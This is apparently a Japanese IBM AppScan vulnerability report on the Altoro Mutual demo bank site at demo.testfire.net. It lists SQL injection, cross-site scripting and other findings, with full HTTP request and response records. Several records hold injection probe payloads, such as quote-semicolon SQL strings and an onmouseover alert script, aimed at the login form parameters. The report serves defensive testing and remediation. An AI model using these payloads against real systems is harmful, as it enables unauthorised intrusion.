セキュリティーの 問 題 jod > ユーザー > Demo User > kan test > セキュリティーの 問 題 エクスポート 方 法 Demo User - 2013/01/31 6:13 2013/01/31 12:41:50 で 生 成 このレポートのヘルプ
目 次 概 要 4 見 つかった 問 題 のタイプ 4 影 響 を 受 ける URL / ファイル 5 推 奨 される 修 正 6 セキュリティー リスク 7 WASC 脅 威 の 分 類 8 重 大 度 別 に 分 類 された 問 題 9 [ 高 ] 問 題 http:// demo.testfire.net / bank / login.aspx - 13 9 [ 高 ] SQL インジェクション 9 [ 高 ] 暗 号 化 されていないログイン 要 求 11 [ 高 ] SQL インジェクション 12 [ 高 ] クロスサイト スクリプティング 14 [ 高 ] 暗 号 化 されていないログイン 要 求 17 [ 中 ] セッション 識 別 子 が 未 更 新 18 [ 低 ] データベース エラー パターンを 検 出 19 [ 低 ] データベース エラー パターンを 検 出 21 [ 低 ] データベース エラー パターンを 検 出 23 [ 低 ] パスワード フィールドで HTML の autocomplete 属 性 が 無 効 になっていません 25 [ 情 報 ] HTML コメントによる 秘 密 情 報 の 開 示 28 [ 情 報 ] アプリケーション エラー 31 [ 情 報 ] アプリケーション エラー 32 [ 高 ] 問 題 http:// demo.testfire.net / comment.aspx - 6 33 [ 高 ] クロスサイト スクリプティング 33 [ 高 ] クロスサイト スクリプティング 36 [ 中 ] フレームからのフィッシング 39 [ 中 ] リンク インジェクション (クロスサイト リクエスト フォージェリーの 助 長 ) 42 [ 情 報 ] アプリケーション エラー 45 [ 情 報 ] サーバーのパス 開 示 の 可 能 性 のあるパターンを 発 見 46 [ 高 ] 問 題 http:// demo.testfire.net / default.aspx - 1 48 [ 高 ] 汚 染 Null バイト Windows ファイルの 取 得 48 [ 高 ] 問 題 http:// demo.testfire.net / search.aspx - 3 51 [ 高 ] クロスサイト スクリプティング 51 [ 中 ] フレームからのフィッシング 54 [ 中 ] リンク インジェクション (クロスサイト リクエスト フォージェリーの 助 長 ) 57 [ 高 ] 問 題 http:// demo.testfire.net / survey_complete.aspx - 5 60 [ 高 ] クロスサイト スクリプティング 60 [ 中 ] フレームからのフィッシング 63 [ 中 ] リンク インジェクション (クロスサイト リクエスト フォージェリーの 助 長 ) 66 [ 低 ] パラメーター 値 で 電 子 メール アドレスのパターンが 検 出 されました 69 [ 情 報 ] 電 子 メール アドレス パターンを 発 見 70 [ 低 ] 問 題 http:// demo.testfire.net / admin / admin.aspx - 1 72 [ 低 ] 管 理 ページへの 直 接 アクセス 72 [ 情 報 ] 問 題 http:// demo.testfire.net / feedback.aspx - 1 73 [ 情 報 ] サーバーのパス 開 示 の 可 能 性 のあるパターンを 発 見 73 [ 情 報 ] 問 題 http:// demo.testfire.net / test.aspx - 1 76 [ 情 報 ] アプリケーション テスト スクリプトを 検 知 76 重 大 度 別 の 修 復 タスク 77 [ 高 ] 問 題 http:// demo.testfire.net / bank / login.aspx - 13 77 [ 高 ] 問 題 http:// demo.testfire.net / comment.aspx - 6 77 [ 高 ] 問 題 http:// demo.testfire.net / default.aspx - 1 77 [ 高 ] 問 題 http:// demo.testfire.net / search.aspx - 3 77
[ 高 ] 問 題 http:// demo.testfire.net / survey_complete.aspx - 5 77 [ 低 ] 問 題 http:// demo.testfire.net / admin / admin.aspx - 1 78 [ 情 報 ] 問 題 http:// demo.testfire.net / feedback.aspx - 1 78 [ 情 報 ] 問 題 http:// demo.testfire.net / test.aspx - 1 78 アドバイザリーと 推 奨 される 修 正 79 クロスサイト スクリプティング 79 SQL インジェクション 95 汚 染 Null バイト Windows ファイルの 取 得 110 暗 号 化 されていないログイン 要 求 120 フレームからのフィッシング 121 リンク インジェクション (クロスサイト リクエスト フォージェリーの 助 長 ) 123 セッション 識 別 子 が 未 更 新 125 管 理 ページへの 直 接 アクセス 126 データベース エラー パターンを 検 出 127 パスワード フィールドで HTML の autocomplete 属 性 が 無 効 になっていません 144 パラメーター 値 で 電 子 メール アドレスのパターンが 検 出 されました 145 HTML コメントによる 秘 密 情 報 の 開 示 146 アプリケーション テスト スクリプトを 検 知 147 アプリケーション エラー 148 サーバーのパス 開 示 の 可 能 性 のあるパターンを 発 見 163 電 子 メール アドレス パターンを 発 見 164
概 要 見 つかった 問 題 のタイプ 問 題 のタイプ 問 題 の 数 SQL インジェクション 2 クロスサイト スクリプティング 5 暗 号 化 されていないログイン 要 求 2 汚 染 Null バイト Windows ファイルの 取 得 1 セッション 識 別 子 が 未 更 新 1 フレームからのフィッシング 3 リンク インジェクション (クロスサイト リクエスト フォージェリーの 助 長 ) 3 データベース エラー パターンを 検 出 3 パスワード フィールドで HTML の autocomplete 属 性 が 無 効 になっていません 1 パラメーター 値 で 電 子 メール アドレスのパターンが 検 出 されました 1 管 理 ページへの 直 接 アクセス 1 HTML コメントによる 秘 密 情 報 の 開 示 1 アプリケーション エラー 3 アプリケーション テスト スクリプトを 検 知 1 サーバーのパス 開 示 の 可 能 性 のあるパターンを 発 見 2 電 子 メール アドレス パターンを 発 見 1 Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 4 -
影 響 を 受 ける URL/ファイル URL/ファイル 問 題 の 数 http://demo.testfire.net/bank/login.aspx 13 http://demo.testfire.net/comment.aspx 6 http://demo.testfire.net/default.aspx 1 http://demo.testfire.net/search.aspx 3 http://demo.testfire.net/survey_complete.aspx 5 http://demo.testfire.net/admin/admin.aspx 1 http://demo.testfire.net/feedback.aspx 1 http://demo.testfire.net/test.aspx 1 Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 5 -
推 奨 される 修 正 推 奨 される 修 正 影 響 を 受 ける 問 題 の 数 Review possible solutions for hazardous character injection 16 アクセスされるファイルが 仮 想 パスにあり 特 定 の 拡 張 子 を 持 つようにします ユーザーの 入 力 か ら 特 殊 な 文 字 を 削 除 します 機 密 情 報 を 送 信 するときには 必 ず SSL および POST (body) パラメーターを 使 用 してください 2 外 部 で 作 成 されたセッション 識 別 子 を 受 け 入 れないようにします 1 autocomplete 属 性 を 正 しく off に 設 定 してください 1 Web サイトからすべての 電 子 メール アドレスを 削 除 してください 2 管 理 スクリプトに 適 切 な 許 可 を 適 用 します 1 HTML コメントから 秘 密 情 報 を 削 除 します 1 お 使 いの Web サーバーまたは Web アプリケーションに 対 応 するセキュリティー パッチをダウンロードします サーバーからテスト スクリプトを 削 除 します 1 1 2 パラメーター 値 が 期 待 される 範 囲 とタイプであることを 確 認 します デバッグ エラー メッセージお よび 例 外 を 出 力 しないようにします 3 Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 6 -
セキュリティー リスク リスク (Web サーバー ユーザーのパーミッション 制 限 がかけられている) Web サーバー 上 の 任 意 のファイル (たとえばデータベース ユーザー 情 報 や 設 定 ファイル) の 内 容 を 表 示 することができます 問 題 の 数 データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 5 ハッカーが 正 規 のユーザーになりすまし ユーザーのレコードを 表 示 または 改 変 したり ユーザ ーとしてトランザクションを 実 行 するのに 使 用 することができるカスタマー セッションおよび Cookie を 盗 み 出 したり 操 作 することができます 暗 号 化 されずに 送 信 されているユーザー 名 やパスワードなどのユーザー ログイン 情 報 を 盗 み 出 せる 可 能 性 があります Web サーバー 上 の Web ページ スクリプトおよびファイルをアップロード 改 変 または 削 除 することができます 知 識 の 乏 しいユーザーに ユーザー 名 パスワード クレジット カード 番 号 社 会 保 険 番 号 など の 秘 密 情 報 を 提 供 するように 求 めることができます Web アプリケーションの 認 証 メカニズムをバイパスできる 可 能 性 があります 1 ユーザーの 権 限 を 拡 大 して Web アプリケーションに 対 する 管 理 権 限 を 獲 得 することができます 1 ユーザー 名 パスワード マシン 名 などの Web アプリケーションに 関 する 秘 密 情 報 や 秘 密 のファイルの 場 所 などの 情 報 を 取 得 することができま す アプリケーション ロジック およびユーザー 名 やパスワードなどのその 他 の 秘 密 情 報 を 公 開 する 可 能 性 のある 一 時 スクリプト ファイルをダウンロードできます 攻 撃 者 がさらなる 攻 撃 を 展 開 し Web アプリケーションのファイル システム 構 造 についての 情 報 を 取 得 するのに 役 立 つ 可 能 性 のある Web サーバーのインストールの 絶 対 パスが 取 得 できます 秘 密 のデバッグ 情 報 を 収 集 することができます 3 1 9 2 3 6 3 1 2 Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 7 -
WASC 脅 威 の 分 類 WASC 脅 威 の 分 類 問 題 の 数 Null バイト インジェクション 1 アプリケーション プライバシー テスト 3 アプリケーション 品 質 テスト 3 クライアント サイド アタック: クロスサイト スクリプティング 5 クライアント サイド アタック: コンテンツ スプーフィング 6 コマンドの 実 行 : SQL インジェクション 5 許 可 : セッションの 固 定 1 情 報 の 開 示 : 情 報 漏 えい 5 情 報 の 開 示 : 予 測 可 能 なリソースの 位 置 2 Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 8 -
重 大 度 別 に 分 類 された 問 題 8 個 の URL で 16 個 の 別 個 のタイプの 問 題 が 31 個 あります [ 高 ] 問 題 http://demo.testfire.net/bank/login.aspx - 13 問 題 1 / 13 [ 高 ] SQL インジェクション 問 題 : 161 重 大 度 : 高 URL: http://demo.testfire.net/bank/login.aspx パラメーター: passw リスク: データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 16 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : 要 求 / 応 答 : 'passw' 'Demo1234%27%3B' SQL SQL POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 45 uid=1234& passw=demo1234%27%3b &btnsubmit=login HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 31 Jan 2013 04:38:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0_head"><title> [0x9]Altoro Mutual: Server Error </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;font-weight:bold;">sign In</a> <a id="_ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 9 -
<div id="wrapper" style="width: 99%;"> <div class="err" style="width: 99%;"> <h1>an Error Has Occurred</h1> <h2>summary:</h2> <p><b><span id="_ctl0_content_lblsummary">characters found after end of SQL statement. </span></b></p> <h2>error Message:</h2> <p><span id="_ctl0_content_lbldetails">system.data.oledb. OleDbException : Characters found after end of SQL statement. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbparams, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, String srctable) at Altoro.Authentication.ValidateUser(String uname, String pword) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender, EventArgs e) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 33 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includestagesbeforeasyncpoint, Boolean includestagesafterasyncpoint)</span></p> <div id="footer" style="width: 99%;"> <a id="_ctl0_hyperlink5" href="../default.aspx?content=privacy.htm">privacy Policy</a> <a id="_ctl0_hyperlink6" href="../default.aspx?content=security.htm">security Statement</a> 2013 Altoro Mutual, Inc. <div class="disclaimer"> The Altoro Mutual website is published by IBM, Inc. for the sole purpose of demonstrating the effectiveness of AppScan in detecting web application vulnerabilities and website defects. [0x9][0x9]IBM offers a<a id="_ctl0_downloaddemo2" href="http://www.ibm.com/developerworks/downloads/r/appscan/"> free trial of AppScan </a>that you can download and use to scan this website. [0x9][0x9]This site is not a real banking site. [0x9][0x9]Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided "as is" without warranty of any kind, either express or implied. Watchfire does not assume any risk in relation to your use of this website. For additional Terms of Use, please go to <a id="_ctl0_hyperlink7" href="http://www.ibm.com/legal/us/en/?lnk=flg-tous-usen">terms of Use on ibm.com</a>.<br /><br /> Copyright 2013, Watchfire Corporation, All rights reserved. </body> </html> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 10 -
問 題 2 / 13 [ 高 ] 暗 号 化 されていないログイン 要 求 問 題 : 173 重 大 度 : 高 URL: http://demo.testfire.net/bank/login.aspx パラメーター: passw リスク: 暗 号 化 されずに 送 信 されているユーザー 名 やパスワードなどのユーザー ログイン 情 報 を 盗 み 出 せる 可 能 性 があります 修 正 : 機 密 情 報 を 送 信 するときには 必 ず SSL および POST (body) パラメーターを 使 用 してください バリアント 1 / 1 論 拠 : 要 求 / 応 答 : POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 39 uid=1234&passw=demo1234&btnsubmit=login HTTP/1.1 200 OK Date: Thu, 31 Jan 2013 04:37:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 9154 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0 ctl0_head"><title> [0x9]Altoro Mutual: Online Banking Login </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /><meta name="keywords" content="altoro Mutual Login, login, authenticate"></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 11 -
問 題 3 / 13 [ 高 ] SQL インジェクション 問 題 : 184 重 大 度 : 高 URL: http://demo.testfire.net/bank/login.aspx パラメーター: uid リスク: データベース エントリーおよびテーブルを 表 示 改 変 または 削 除 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 16 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : 要 求 / 応 答 : 'uid' '1234%27%3B' SQL SQL POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 45 uid=1234%27%3b &passw=demo1234&btnsubmit=login HTTP/1.1 500 Internal Server Error Connection: close Date: Thu, 31 Jan 2013 04:38:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0_head"><title> [0x9]Altoro Mutual: Server Error </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;font-weight:bold;">sign In</a> <a id="_ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> <div id="wrapper" style="width: 99%;"> <div class="err" style="width: 99%;"> <h1>an Error Has Occurred</h1> <h2>summary:</h2> <p><b><span id="_ctl0_content_lblsummary">characters found after end of SQL statement. </span></b></p> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 12 -
<h2>error Message:</h2> <p><span id="_ctl0_content_lbldetails">system.data.oledb. OleDbException : Characters found after end of SQL statement. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr) at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbparams, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeresult) at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, Int32 startrecord, Int32 maxrecords, String srctable, IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataset, String srctable) at Altoro.Authentication.ValidateUser(String uname, String pword) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender, EventArgs e) in d:\downloads\altoromutual_v6\website\bank\login.aspx.cs:line 33 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includestagesbeforeasyncpoint, Boolean includestagesafterasyncpoint)</span></p> <div id="footer" style="width: 99%;"> <a id="_ctl0_hyperlink5" href="../default.aspx?content=privacy.htm">privacy Policy</a> <a id="_ctl0_hyperlink6" href="../default.aspx?content=security.htm">security Statement</a> 2013 Altoro Mutual, Inc. <div class="disclaimer"> The Altoro Mutual website is published by IBM, Inc. for the sole purpose of demonstrating the effectiveness of AppScan in detecting web application vulnerabilities and website defects. [0x9][0x9]IBM offers a<a id="_ctl0_downloaddemo2" href="http://www.ibm.com/developerworks/downloads/r/appscan/"> free trial of AppScan </a>that you can download and use to scan this website. [0x9][0x9]This site is not a real banking site. [0x9][0x9]Similarities, if any, to third party products and/or websites are purely coincidental. This site is provided "as is" without warranty of any kind, either express or implied. Watchfire does not assume any risk in relation to your use of this website. For additional Terms of Use, please go to <a id="_ctl0_hyperlink7" href="http://www.ibm.com/legal/us/en/?lnk=flg-tous-usen">terms of Use on ibm.com</a>.<br /><br /> Copyright 2013, Watchfire Corporation, All rights reserved. </body> </html> Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 13 -
問 題 4 / 13 [ 高 ] クロスサイト スクリプティング 問 題 : 185 重 大 度 : 高 URL: http://demo.testfire.net/bank/login.aspx パラメーター: uid リスク: ハッカーが 正 規 のユーザーになりすまし ユーザーのレコードを 表 示 または 改 変 したり ユーザーとしてトランザクションを 実 行 する のに 使 用 することができるカスタマー セッションおよび Cookie を 盗 み 出 したり 操 作 することができます 修 正 : Review possible solutions for hazardous character injection バリアント 1 / 20 元 の 要 求 に 以 下 の 変 更 が 適 用 されました: 論 拠 : 'uid' '1234%22onmouseover%3D%22alert%2813%29%22' 要 求 / 応 答 : POST /bank/login.aspx HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: ASP.NET_SessionId=0gvgzeevwxsnkhvlcvtmvuey; amsessionid=223745307018 Accept-Language: en-us Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://demo.testfire.net/bank/login.aspx Host: demo.testfire.net User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0;.NET CLR 2.0.50727; SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729; Media Center PC 6.0; Tablet PC 2.0) Content-Length: 75 uid=1234%22onmouseover%3d%22alert%2813%29%22 &passw=demo1234&btnsubmit=login HTTP/1.1 200 OK Date: Thu, 31 Jan 2013 04:38:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=iso-8859-1 Content-Length: 9178 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/dtd/xhtml1- transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" > <head id="_ctl0 ctl0_head"><title> [0x9]Altoro Mutual: Online Banking Login </title><meta http-equiv="content-type" content="text/html; charset=iso-8859-1"><link href="../style.css" rel="stylesheet" type="text/css" /><meta name="keywords" content="altoro Mutual Login, login, authenticate"></head> <body style="margin-top:5px;"> <div id="header" style="margin-bottom:5px; width: 99%;"> <form id="frmsearch" method="get" action="/search.aspx"> [0x9] <table width="100%" border="0" cellpadding="0" cellspacing="0"> [0x9][0x9] <tr> [0x9][0x9] <td rowspan="2"> [0x9][0x9][0x9][0x9]<a id="_ctl0 ctl0_hyperlink1" href="../default.aspx" style="height:80px;width:183px;"><img src="../images/logo.gif" border="0" /></a> [0x9][0x9][0x9][0x9]<a id="_ctl0 ctl0_downloaddemo" href="http://www.ibm.com/developerworks/downloads/r/appscan/" style="height:80px;width:220px;"><img src="../images/banner.png" border="0" /></a> [0x9][0x9][0x9] </td> [0x9][0x9][0x9] <td align="right" valign="top"> [0x9][0x9][0x9] <a id="_ctl0 ctl0_loginlink" title="it does not appear that you have properly authenticated yourself. Please click here to sign in." href="login.aspx" style="color:red;fontweight:bold;">sign In</a> <a id="_ctl0 ctl0_hyperlink3" href="../default.aspx?content=inside_contact.htm">contact Us</a> <a id="_ctl0 ctl0_hyperlink4" href="../feedback.aspx">feedback</a> <label for="txtsearch">search</label> <input type="text" name="txtsearch" id="txtsearch" accesskey="s" /> <input type="submit" value="go" /> [0x9][0x9][0x9] </td> [0x9][0x9] </tr> [0x9][0x9] <tr> [0x9][0x9][0x9] <td align="right" style="backgroundimage:url(/images/gradient.jpg);padding:0px;margin:0px;"><img id="_ctl0 ctl0_image1" src="../images/header_pic.jpg" border="0" style="height:60px;width:354px;" /></td> [0x9][0x9] </tr> [0x9] </table> [0x9]</form> <div id="wrapper" style="width: 99%;"> <table cellspacing="0" width="100%"> <tr> <td width="25%" class="bt br bb"><div id="header1"><img id="_ctl0 ctl0_content_image1" src="../images/pf_lock.gif" alt="secure Login" align="absbottom" border="0" style="height:14px;width:12px;" Copyright IBM Corp. 2000, 2013. All Rights Reserved. - 14 -
/> <a id="_ctl0 ctl0_content_accountlink" title="you do not appear to have authenticated yourself with the application. Click here to enter your valid username and password." class="focus" href="login.aspx">online BANKING LOGIN</a></td> <td width="25%" class="cc bt br bb"><div id="header2"><a id="_ctl0 ctl0_content_linkheader2" class="focus" href="../default.aspx?content=personal.htm">personal</a></td> <td width="25%" class="cc bt br bb"><div id="header3"><a id="_ctl0 ctl0_content_linkheader3" class="focus" href="../default.aspx?content=business.htm">small BUSINESS</a></td> <td width="25%" class="cc bt bb"><div id="header4"><a id="_ctl0 ctl0_content_linkheader4" class="focus" href="../default.aspx?content=inside.htm">inside ALTORO MUTUAL</a></td> </tr> <tr> <td valign="top" class="cc br bb"> <br style="line-height: 10px;"/> <a id="_ctl0 ctl0_content_catlink1" class="subheader" href="../default.aspx?content=personal.htm">personal</a> <ul class="sidebar"> <li><a id="_ctl0 ctl0_content_menuhyperlink1" href="../default.aspx?content=personal_deposit.htm">deposit Product</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink2" href="../default.aspx?content=personal_checking.htm">checking</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink3" href="../default.aspx?content=personal_loans.htm">loan Products</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink4" href="../default.aspx?content=personal_cards.htm">cards</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink5" href="../default.aspx?content=personal_investments.htm">investments & Insurance</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink6" href="../default.aspx?content=personal_other.htm">other Services</a></li> </ul> <a id="_ctl0 ctl0_content_catlink2" class="subheader" href="../default.aspx?content=business.htm">small BUSINESS</a> <ul class="sidebar"> <li><a id="_ctl0 ctl0_content_menuhyperlink7" href="../default.aspx?content=business_deposit.htm">deposit Products</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink8" href="../default.aspx?content=business_lending.htm">lending Services</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink9" href="../default.aspx?content=business_cards.htm">cards</a></li> <li><a id="_ctl0 ctl0_content_menuhyperlink10" href="../default.aspx?content=business_insurance.htm">insurance</a></li> <li><a id="_ctl0 